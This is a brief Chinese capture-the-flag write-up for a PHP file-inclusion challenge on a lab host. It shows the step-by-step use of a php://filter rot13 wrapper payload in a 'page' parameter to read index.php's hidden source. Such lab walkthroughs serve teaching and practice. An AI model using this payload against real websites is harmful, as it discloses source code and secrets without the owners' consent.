文章目录
前言
题目分类:
CTF—Web—文件包含—02—rot13伪协议
一、题目描述
题目:13、另辟蹊径 (题号为13)
二、解题步骤
1、页面跳转
Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。
2、文件包含(参数为page)
Step2:点击信息的时候,URL会发生变化:http://192.168.87.183/index.php?page=index表示page可以被赋值。
(文件包含特征)
3、rot13伪协议包含
Step3:page=php://filter/read=string.rot13/resource=index.php,此时将读取到index.php的内容中隐 藏的rot13格式的网站源码
显示出来。可以理解为将rot13编码的源 码隐藏在index.php,利用这个payload的可以读出隐藏文件。
4、rot13伪协议读取
Step4:访问http://192.168.87.183/index.php?page=php://filter/read=string.rot13/resource=index.php
右键查看源代码,可以看到rot13编码的密文